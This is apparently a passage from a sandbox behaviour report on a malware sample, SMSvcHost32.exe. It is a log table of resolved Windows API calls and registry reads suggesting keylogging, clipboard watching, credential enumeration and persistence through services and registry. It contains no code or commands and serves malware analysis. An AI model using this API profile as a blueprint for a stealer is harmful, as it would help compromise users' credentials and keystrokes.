| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Handle | module_name = Secur32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x6ff60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shell32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = 680, address_out = 0x753cdb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 |
Thread 0xc24
1625
242
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Module | Get Filename | module_name = Secur32.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Handle | module_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, base_address = 0x400000 |
|
2 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId, data = 164 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 63 |
|
1 | |
| System | Get Computer Name | result_out = X2VS1CUM |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
5 | |
| System | Get Time | type = Ticks, time = 171062 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_0, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_1, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_2, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_3, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_4, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_5, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_6, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_7, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow, value_name = gpscsdch_8, type = REG_NONE |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74aa0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExA, address_out = 0x74abf500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExA, address_out = 0x74abf790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74abf620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74abf520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74abf370 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExA, address_out = 0x74ac0a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExA, address_out = 0x74abfa60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x74abfb30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptSetProvParam, address_out = 0x74ad6c90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74ac0650 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74ac10a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x74abcbe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x74ac3910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x74ac0400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetUserKey, address_out = 0x74ad6c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = IsValidSecurityDescriptor, address_out = 0x74ad7070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x74abe430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeAcl, address_out = 0x74abfa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x74ac2a20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74abf330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x74abf640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteKeyW, address_out = 0x74ac04f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenCurrentUser, address_out = 0x74ac1080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueW, address_out = 0x74abf680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74abf350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExW, address_out = 0x74abf470 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74abf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74abf7d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74ac3930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyExA, address_out = 0x74ac1810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextA, address_out = 0x74ac0630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74abfa00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumValueA, address_out = 0x74ac1e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74ad6670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74ac02a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74abfb10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = DeregisterEventSource, address_out = 0x74ab8570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegisterEventSourceA, address_out = 0x74ac1570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74ac0440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityInfo, address_out = 0x74ac05f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityInfo, address_out = 0x74abfbe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclA, address_out = 0x74ac3cc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74ac1030 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ReportEventA, address_out = 0x74ad37a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x77810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x778262e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x7782abd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = ToUnicodeEx, address_out = 0x77892420 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CallNextHookEx, address_out = 0x77823550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyState, address_out = 0x7782ddd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x77844f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CloseClipboard, address_out = 0x778495c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MapVirtualKeyA, address_out = 0x77843e20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x7783f6e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x77840160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x779eaee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetClipboardViewer, address_out = 0x77849a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x77825d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnhookWindowsHookEx, address_out = 0x77848fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = OpenClipboard, address_out = 0x77843920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookExW, address_out = 0x7782fb10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x77829860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowTextW, address_out = 0x7783cb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetClipboardData, address_out = 0x77842bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetProcessWindowStation, address_out = 0x77848b10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7788fec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetUserObjectInformationW, address_out = 0x77848fa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMessageA, address_out = 0x7783e130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MapVirtualKeyW, address_out = 0x77843c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageA, address_out = 0x77846f10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = IsCharAlphaNumericW, address_out = 0x7789ac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7782d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x7783f6c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x778404a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerW, address_out = 0x7789ab20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardState, address_out = 0x77849060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x77848cb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x77829580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayout, address_out = 0x7782ef20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetAsyncKeyState, address_out = 0x7782e820 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\psapi.dll, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x772c13e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessMemoryInfo, address_out = 0x772c16c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExA, address_out = 0x772c1660 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x772c1360 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ws2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSAEnumProtocolsW, address_out = 0x746d7ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 22, address_out = 0x746d4970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSAIoctl, address_out = 0x746d2f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 5, address_out = 0x746d48b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 4, address_out = 0x746d6090 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 8, address_out = 0x746c4ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 9, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 13, address_out = 0x746d5f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 16, address_out = 0x746d1d20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 21, address_out = 0x746cecc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 112, address_out = 0x746c5a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 7, address_out = 0x746d3e40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASocketW, address_out = 0x746ce7d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASendTo, address_out = 0x746d7f90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 6, address_out = 0x746d3830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSARecvFrom, address_out = 0x746d8090 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSARecv, address_out = 0x746d2c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 10, address_out = 0x746ce180 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 18, address_out = 0x746d1f00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = GetNameInfoW, address_out = 0x746d4050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = GetAddrInfoW, address_out = 0x746d2180 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = FreeAddrInfoW, address_out = 0x746d5ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSADuplicateSocketW, address_out = 0x746efca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSASend, address_out = 0x746d2de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 14, address_out = 0x746c4ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 151, address_out = 0x746c47e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 17, address_out = 0x746d7370 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = WSCGetProviderPath, address_out = 0x746fde80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 57, address_out = 0x746f12a0 |
|
1 | |
